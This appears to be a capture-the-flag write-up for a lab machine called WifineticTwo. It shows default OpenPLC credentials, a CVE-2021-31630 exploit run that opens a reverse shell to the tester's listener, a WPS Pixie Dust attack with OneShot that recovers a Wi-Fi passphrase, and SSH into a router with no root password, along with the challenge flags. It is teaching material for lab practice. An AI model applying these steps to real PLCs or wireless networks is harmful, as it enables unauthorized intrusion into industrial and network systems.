WifineticTwo

Recon

nmap_scan.log

HTTP (8080)

OpenPLC

Writeup.png

We have no users so we can't exactly go somewhere.. Using default credentials: openplc:openplc we are able to login!

OpenPLC creds: openplc:openplc

Authenticated RCE

CVE-2021-31630OpenPLC WebServer v3 - Authenticated RCE

└─$ py cve_2021_31630.py -u openplc -p openplc http://10.10.11.7:8080/ -lh 10.10.14.37 -lp 4444

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------

[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]

[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 20 secs
[>] LHOST    : 10.10.14.37
[>] LPORT    : 4444

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!

Reverse Shell

We are root, which is odd... something isn't right.

└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.7:38966.
root@attica03:/opt/PLC/OpenPLC_v3/webserver# whoami
root
root@attica03:/opt/PLC/OpenPLC_v3/webserver# id
uid=0(root) gid=0(root) groups=0(root)

User.txt

root user contains user.txt meaning this root user is not the one we need.

root@attica03:~# cat user.txt
6e1ccfe76f3fdb33d106b3640c211f4b

Privilege Escalation

Just like the box name suggests we are dealing with a WiFi. Check network interfaces:

root@attica03:~# ip -c address show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0@if20: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:79:d1:d2 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.0.3.4/24 brd 10.0.3.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet 10.0.3.237/24 metric 100 brd 10.0.3.255 scope global secondary dynamic eth0
       valid_lft 3249sec preferred_lft 3249sec
    inet6 fe80::216:3eff:fe79:d1d2/64 scope link
       valid_lft forever preferred_lft forever
7: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
root@attica03:~# iwconfig
eth0      no wireless extensions.
lo        no wireless extensions.
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

We have Wi-Fi related command to utilize, such as iw - show / manipulate wireless devices and their configuration

root@attica03:~# iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 9207.708s [boottime]
        TSF: 1722101672346840 usec (19931d, 17:34:32)
        freq: 2412
        beacon interval: 100 TUs
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        last seen: 0 ms ago
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
        DS Parameter set: channel 1
        ERP: Barker_Preamble_Mode
        Extended supported rates: 24.0 36.0 48.0 54.0
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        Extended capabilities:
                 * Extended Channel Switching
                 * SSID List
                 * Operating Mode Notification
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
                 * Manufacturer:
                 * Model:
                 * Model Number:
                 * Serial Number:
                 * Primary Device Type: 0-00000000-0
                 * Device name:
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0

WPS is supported meaning it could be bruteforced.

Pixie Dust Attack

OneShot performs Pixie Dust attack without having to switch to monitor mode.

root@attica03:/dev/shm# python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
#    BSSID              ESSID                     Sec.     PWR  WSC device name             WSC model
1)   02:00:00:00:01:00  plcrouter                 WPA2     -30
Select target (press Enter to refresh): 1 # <-- Input
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!'
[+] AP SSID: 'plcrouter'

Note: Python version of attack is used as it's much simpler then compiling C

Connect to plcrouter

Generate config file for connection and then use generated config to connect to router.

root@attica03:/dev/shm# wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' | tee plcrouter.conf
network={
        ssid="plcrouter"
        #psk="NoWWEDoKnowWhaTisReal123!"
        psk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}
root@attica03:/dev/shm# wpa_supplicant -B -c plcrouter.conf -i wlan0
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
root@attica01:/dev/shm# ip -brief a s               
lo               UNKNOWN        127.0.0.1/8 ::1/128
eth0@if18        UP             10.0.3.2/24 10.0.3.52/24 metric 100 fe80::216:3eff:fefc:910c/64
wlan0            UP             fe80::ff:fe00:200/64
root@attica01:/dev/shm# dhclient -v 
Internet Systems Consortium DHCP Client 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

Listening on LPF/wlan0/02:00:00:00:02:00
Sending on   LPF/wlan0/02:00:00:00:02:00
Listening on LPF/eth0/00:16:3e:fc:91:0c
Sending on   LPF/eth0/00:16:3e:fc:91:0c
Sending on   Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 3 (xid=0x725d3820)
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 3 (xid=0x1aeee019)
DHCPOFFER of 10.0.3.52 from 10.0.3.1
DHCPREQUEST for 10.0.3.52 on eth0 to 255.255.255.255 port 67 (xid=0x19e0ee1a)
DHCPACK of 10.0.3.52 from 10.0.3.1 (xid=0x1aeee019)
RTNETLINK answers: File exists
bound to 10.0.3.52 -- renewal in 1611 seconds.
root@attica01:/dev/shm# ip -brief a s     
lo               UNKNOWN        127.0.0.1/8 ::1/128
eth0@if18        UP             10.0.3.2/24 10.0.3.52/24 metric 100 fe80::216:3eff:fefc:910c/64
wlan0            UP             192.168.1.84/24 fe80::ff:fe00:200/64
root@attica01:/dev/shm# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
attica01                         (incomplete)                              eth0
192.168.1.1              ether   02:00:00:00:01:00   C                     wlan0
10.0.3.1                 ether   00:16:3e:00:00:00   C                     eth0

Use dhclient to get an IP and using arp check network ip.

root@attica01:/dev/shm# ssh root@192.168.1.1
ssh root@192.168.1.1

BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.2, r23630-842932a63d
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~# ls
root.txt  shell

Root.txt

root@ap:~# cat root.txt
a086fa5a9ebffe09a83f4fd434d3fb2b